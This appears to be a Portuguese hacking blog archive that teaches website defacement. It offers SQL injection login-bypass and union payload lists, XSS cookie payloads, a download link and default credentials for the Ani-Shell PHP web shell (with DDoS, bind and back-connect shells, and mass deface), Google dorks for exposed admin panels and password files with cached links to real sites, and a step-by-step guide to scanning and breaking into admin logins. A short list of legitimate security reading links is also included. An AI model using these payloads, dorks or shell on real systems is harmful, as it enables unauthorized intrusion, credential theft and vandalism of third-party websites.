Pesquisar

Mostrando postagens com marcador Defacement - Injection. Mostrar todas as postagens
Mostrando postagens com marcador Defacement - Injection. Mostrar todas as postagens

3 de fev. de 2013

Mini curso defacer

Tutorial defacer na área!

O cara que criou esse tutorial todo numa página html merece um bitcoin pelo esforço e meses dedicados a fazer esse tutorial! heuheuheuheue.
Sem mas, aí vai o link:

http://danhorus.x10.bz/Tutoriais/SQLi,%20LFD%20e%20XSS.html

... Ainda tive coragem de escrever "mini" no título, MUHUHUAHAHAHHAAHAA

27 de dez. de 2012

Exemplo de Ataques XSS e de SQL Injection

... Vamos aos rápidos exemplos:

Esse código de SQL injection é inserido no campo de Login ou Username de um site, onde faz com que ele se autentique como aquele usuário com uma senha qualquer:


‘or’=1    '
)or('a'='a
‘or=1
')or('1'='1
‘or’a’=‘a
'or'1'='1


e é colocado uma senha como: xxx

Esse código Mostra a versão do Banco de Dados de MYSQL, onde user123 é conhecido pelo Hacker: 'user123' or 1=(select @@version)--    ou    ' union select @@version,1,1--


Vamos ao XSS (inserindo na URL):

Exibindo Cookies:

'"><script>alert('xss');alert(document.cookie)</script>      ou
<script>alert('xss');alert(document.cookie)</script>

Material de segurança computacional e segurança de redes - Grátis!

Segue os links abaixo!:

ftp://ftp.registro.br/pub/gts/  - Este link é do "registro.br", site grátis nacional, de domínios ".br"

http://www.inf.ufsc.br/~bosco/ensino/ine5680/ - Este é do Professor Bosco da UFSC, e no diretório acima, você encontrará mais material.

http://www.cert.br/docs/palestras/ - Este é do CERT, órgão que cuida do status da segurança no Brasil.

http://www.cgi.br/publicacoes/index.htm - Este é do Comitê Gestor de Internet no Brasil, disponibilizando revistas, artigos, livros, etc.

http://www.cgi.br/gt/gtbv/gtbv.htm - Ainda no CGI, você encontra as bibliotecas onlines, no qual pode-se fazer pesquisas.

http://br.librosintinta.in/ - Biblioteca de procura de PDFs, aqui pode-se procurar material (tem demais!)

http://internetsegura.br/ - Para os mais leigos, aqui está uma página de recomendações de segurança na internet, ainda sim, um órgão brasileiro.

http://ipv6.br/curso/ - Curso de rede IPV6 grátis;
http://ipv6.br/download/

http://www.cetic.br/palestras/index.htm
http://www.cetic.br/publicacoes/index.htm



http://www.wdl.org/pt/search/gallery/ - Biblioteca digital mundial;

Livraria Aberta - Por enquanto, é uma mera cópia do Dominio Público.

Biblioteca Digital da unicamp - Ache aqui artigos computacionais;

http://www.dominiopublico.gov.br/ - Dominio Público: é possíver achar material computacional aqui.


12 de out. de 2012

Download Ani-Shell 1.4 +


Shell em PHP

SourceForge - [DOWNLOAD] - 24 KB - Zip

ATENÇÃO:

Padrao de login:
Usuário: lionaneesh
Senha: lionaneesh


Características/ Funçoes:


Shell 
Mass Mailer 
DDos 
Web-Server Fu
zzer 
Uploader 
Design 
Login 
Mass Code Injector (Appender and Overwriter) 
Encoded Title 
Back Connect 
Bind Shell 
Lock Mode Customisable 
Tracebacks (email alerts) 
PHP Evaluate 
PHP MD5 Cracker 
Anti-Crawler 
Mass Deface



3 de jul. de 2012

Aprenda um pouco sobre SQL injection online

Um ótima site que ensina sobre SQL Injection, online, é o http://sqlzoo.net/hack/ , lá você terá teoria e prática, lembrando que é apenas um tutorial não aprofundado.

Abraços, divirta-se.

23 de out. de 2011

Strings Malignas do Google

ENTRE NO SITE DO GOOGLE: www.google.com e após coloque na barra de endereços(URL)

index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

vcs poderaumate mesmopastas de acesso root

http://64.233.167.104/search?q=cache:7E-Hf7gzvMYJ:felix.unife.it/Root/+%22index+of/root%22&hl=pt-BR&ct=clnk&cd=1&gl=br

nuss o google continua do jeito que gosto admin


http://64.233.167.104/search?q=cache:n538lfFtfRcJ:www.conass.org.br/admin/arquivos/+%22index+of/admin%22&hl=pt-BR&ct=clnk&cd=1&gl=br


http://64.233.167.104/search?q=cache:504ifu-a1f0J:www.sismod.com.br/Admin/+%22index+of/admin%22&hl=pt-BR&ct=clnk&cd=3&gl=br

http://www.blogg.org/admin/kietu/media/
http://www.cimar.ucr.ac.cr/administrador-pronostico/autentificacion/imagenes/

http://www.intelicelsa.com/administrador/

http://perrodeaguas.net/administrador/funciones/

bem voltando senhas admin

http://72.14.205.104/search?q=cache:3XliNQ9qquwJ:trade.hamk.fi/wwwkurssi/_vti_pvt/administrators.pwd+inurl:administrators.pwd&hl=pt-BR&ct=clnk&cd=7&gl=br


http://72.14.205.104/search?q=cache:wWNFjzDDF9MJ:www.bucks.edu/~fishg/_vti_pvt/administrators.pwd+inurl:administrators.pwd&hl=pt-BR&ct=clnk&cd=8&gl=br

http://72.14.205.104/search?q=cache:IxP9AbvsyOEJ:www.21stcapital.com/_vti_pvt/administrators.pwd+inurl:administrators.pwd&hl=pt-BR&ct=clnk&cd=15&gl=br


a busca dentro do google pra tais senhas
é esta :

inurl:administrators.pwd

pra quem conhece um pouco de home pages
alguns diretorios bem interessante

http://72.14.205.104/search?q=cache:9o1ckLLIE74J:support.apollo3.com/password/+%E2%80%9CIndex+of+/%E2%80%9D+%2Bpassword.txt&hl=pt-BR&ct=clnk&cd=2&gl=br


http://72.14.205.104/search?q=cache:7Y1Bydblz84J:homepages.cae.wisc.edu/~ece468/+%E2%80%9CIndex+of+/%E2%80%9D+%2Bpassword.txt&hl=pt-BR&ct=clnk&cd=3&gl=br

Strings ASP básicas para invasão de sites

segue a lista:

/admin/default.asp
/admin/index.asp
/admin/login.asp
/admin/password.asp
/admin/senha.asp
/login/login.asp
/adm/login.asp
/adm/index.asp
/adm/default.asp
/login/index.asp
/login/default.asp
/webmaster/login.asp
/webadmin/default.asp
/webadmin/index.asp
/webadmin/default.asp
/acesso/admin.asp
/acesso/admin/default.asp
/acesso/admin/index.asp
/adm/admin/default.asp
/adm/admin/index.asp
/adm/admin/login.asp
/adm/default.asp
/adm/index.asp
/adm/login.asp
/admin/acesso.asp
/admin/adm/senha.asp
/admin/admin.asp
/admin/admin/adm.asp
/admin/admin/default.asp
/admin/autenticar.asp
/admin/default.asp
/admin/entrar.asp
/admin/index.asp
/admin/logar.asp
/admin/login.asp
/admin/logout.asp
/admin/loja/senha.asp
/admin/lojas/default.asp
/admin/lojas/index.asp
/admin/menu.asp
/admin/painel.asp
/admin/password.asp
/admin/senha.asp
/admin/site/entrar.asp
/administrador/login.asp
/area_restrita/admin.asp
/area_restrita/index.asp
/area_restrita/login.asp
/asp/admin/default.asp
/asp/admin/index.asp
/asp/admin/login.asp
/banner/admin/
/banner/admin/default.asp
/banner/admin/index.asp
/banners/admin.asp
/banners/admin/default.asp
/banners/admin/index.asp
/banners/admin/login.asp
/busines/admin/
/cadastro/admin/
/client/admin.asp
/clientes/admin/
/comercio/admin.asp
/comercio/admin/default.asp
/comercio/admin/index.asp
/compras/admin/
/controle/admin.asp
/controle/admin/default.asp
/controle/admin/index.asp
/controle/admin/login.asp
/db/admin/default.asp
/db/admin/index.asp
/db/admin/login.asp
/db/admin/senha.asp
/ecommerce/admin/default.asp
/ecommerce/admin/index.asp
/ecommerce/admin/login.asp
/edit/admin/default.asp
/edit/admin/index.asp
/editar/admin.asp
/editar/admin/default.asp
/editar/admin/index.asp
/editar/admin/login.asp
/eshop/admin.asp
/eshop/admin/
/eshop/admin/default.asp
/eshop/admin/index.asp
/form/admin.asp
/home/adm/defaul.asp
/home/adm/index.asp
/home/admin/login.asp
/home/admin/senha.asp
/host/admin/default.asp
/host/admin/index.asp
/host/admin/login.asp
/images/admin/
/imprensa/admin.asp
/imprensa/admin/default.asp
/imprensa/admin/index.asp
/imprensa/admin/login.asp
/imprensa/login.asp
/login/admin.asp
/login/default.asp
/login/index.asp
/login/login.asp
/login_admin/default.asp
/login_admin/index.asp
/login_admin/login.asp
/loja/admin.asp
/menu/admin/admin.asp
/menu/admin/default.asp
/menu/admin/index.asp
/menu/admin/login.asp
/menu/admin/senha.asp
/menu_admin/default.asp
/menu_admin/index.asp
/menu_admin/login.asp
/menu_admin/senha.asp
/news/admin/
/news/admin/default.asp
/news/admin/index.asp
/news/admin/login.asp
/news/admin/senha.asp
/newsleter/admin.asp
/newsleter/admin/default.asp
/newsleter/admin/index.asp
/noticias/admin/
/noticias/admin/senha.asp
/order/admin/default.asp
/order/admin/index.asp
/order/admin/login.asp
/order/admmin.asp
/painel/admin/admin.asp
/painel/admin/default.asp
/painel/admin/index.asp
/painel/admin/login.asp
/painel/admin/senha.asp
/parceiros/admin.asp
/parceiros/admin/default.asp
/parceiros/admin/index.asp
/parceiros/admin/login.asp
/pedidos/admin/default.asp
/pedidos/admin/index.asp
/pedidos/admin/login.asp
/pedidos/admin/senha.asp
/portal/admin/
/portal/admin/senha.asp
/post/admin/
/post/admin/default.asp
/post/admin/index.asp
/post/admin/login.asp
/principal/admin.asp
/principal/admin/default.asp
/principal/admin/index.asp
/principal/admin/login.asp
/principal/admin/senha.asp
/restrito/acesso/admin.asp
/restrito/adm/login.asp
/restrito/admin.asp
/shop/admin/default.asp
/shop/admin/index.asp
/shop/admin/logar.asp
/shop/admin/login.asp
/shopping/admin.asp
/shopping/admin/default.asp
/shopping/admin/index.asp
/shopping/admin/login.asp
/site/admin/
/site/admin/default.asp
/site/admin/index.asp
/site/admin/login.asp
/site/admin/senha.asp
/store/admin.asp
/store/admin/default.asp
/store/admin/index.asp
/store/admin/logar.asp
/stroe/admin/login.asp
/strore/admin/senha.asp
/vendas/admin/senha.asp
/web/admin/default.asp
/web/admin/index.asp
/web/admin/login.asp
/webadmin/default.asp
/webadmin/index.asp
/webmaster/autenticar.asp
/webmaster/entrar.asp
/webmaster/logar.asp
/webmaster/login.asp
/webmaster/senha.asp

' or ' 1
'1' = '1'
' or '1'='1
'' or '1'='1'
"senha"
"password"
"teste"
"123"
"1234"
"12345"
"VB"
"visual"
"basic"
' or senha='teste
' or senha='login 'or email like 'dm%
' or email like 'dm%
'or '1'='1' order by 1 --
' or '1'='1' order by 1 --
' or 1=1--
'or''='
' or 'a'='a
') or ('a'='a
b' or ' 1='
' or '|
123'or'=
admin'-
' or '1=true
7' or ' 1

Strings para usar no Google

Muitas pessoas, estao acostumadas de só fazer pesquisas no google de forma direta!
ou seja se ele vai procura algo como uma musica. Simplesmente ele digita o nome da musica e pronto.
E ainda se limita, pois quase todos os links achados chamam paginas, para compra o produto desejado, como exemplo MercadoLivre,Buscapé entre outros.

Com algumas Strings que estarei mostrando agora é possivel sim localizar estes arquivos que outrora era "impossivel".

Procure por Músicas em formato Mp3:

intitle:index.of"mp3"+"NOME DA BANDA OU MUSICA"-html-htm-php-asp"last Modified"

Procurar por Filmes e Videos:

Para entendermos e para vincarmos bem esta mecanica 'vamos pedir emprestados' alguns operadores
que usamos nas pesquisas MP, assim vamos usar estes 'comandos'.
-inurl:htm -inurl:html intitle: "index of"

Podemos também usar "-inurl:php" para evitar os aborrecidos arquivos index.php que dao resultados na pesquisa, páginas que nao interessam.

Agora adicionamos as nossas conhecidas extensoes dos filmes como o mpg,avi,wmv à nossa chave de procura e podemos testar.

Vai certamente encontrar muitos diretorios recheadas de filmes, mas podemos refinar ainda mais a nossa pesquisa adicionando um chave específica à linha de comandos.

-inurl:htm -inurl:html -inurl:php intitle:"index of" (mpg|avil|wmv)"SEU FILME OU VIDEO PROCURADO"

O Operador (mpg/avi/wmv) Também pode ser escrito (mpg or avi or wmv).

Musicas/Videos

Digite

?intitle:index.of? mp3 (nome do Artista)
?intitle:index.of? avi (nome do Artista)
Ex:
?intitle:index.of? mp3 simpleplan
?intitle:index.of? avi hackers

--------------------------------------------------------------------------------
LINKS PARA SUA PÁGINA

Por exemplo, se vc tem um HP e você quer ver quantos links existentes para akela página usamos a seguinte String:

link:http://www.google.com.br/

Acima substitua o site do google pelo seu site.

22 de out. de 2011

SQL Injection básico

É o seguinte, Este truque é aplicado ao navegador, no modo de string, que acessa o servidor, varrendo os cookies, e assim podendo liberar a entrada do administrador.

Google é seu amigo, e te ajudará nesta tarefa, pois ele te ajudará a pesquisar por páginas específicas.
Iremos então usar o comando "allinurl".
esse comando procura especificadamente aquilo que se vem depois dos dois pontos
exemplo: allinurl:/site/admin/
com esse codigo ele caçará paginas com campos de logins de adiministraçoes.
abaixo uma lista com algums codigos para vc pesquisar no google.


allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp


Pegue uma das strings acima e pesquise a vontade:


Após isso saira uma lista de sites com paginas com campos de logins e senhas
ate ai tudo bem agora vamos escaniialos usando um scanner como o Acutinex
depois de scaneado e acuzando a suposta vulnerabilidade de sql injection

É só testarmos strings nos campos de login sda página afetada.


A mesma string usada no login deve ser usada no campo de senha ok.
abaixo uma lista de strings:

* b’ or ‘ 1=’
* ‘ or ‘1
* ‘ or ‘|
* ‘ or ‘a’='a
* ‘ or ”=’
* ‘ or 1=1–
* ‘) or (’a'=’a
* ‘ or ‘1′=’1
* admin ‘ – -
* ‘ ou 0=0 –
* “ou 0=0 –
* ou 0=0 –
* ‘ ou 0=0 #
* “ou 0=0 #
* ou 0=0 #
* ‘ ou ‘ x’='x
* “ou” x”=”x
* ‘) ou (’ x’='x
* ‘ ou 1=1 –
* “ou 1=1 –
* ou 1=1 –
* ‘ ou a=a –
* “ou” a”=”a
* ‘) ou (’ a’='a
* “) ou (”a”=”a
* hi “ou” a”=”a
* hi “ou 1=1 –
* hi ‘ ou 1=1 –
* hi ‘ ou ‘ a’='a
* hi ‘) ou (’ a’='a
* hi”) ou (”a”=”a
* ‘ or ‘x’='x


Teste até conseguir, faça uma confusão no Banco de dados.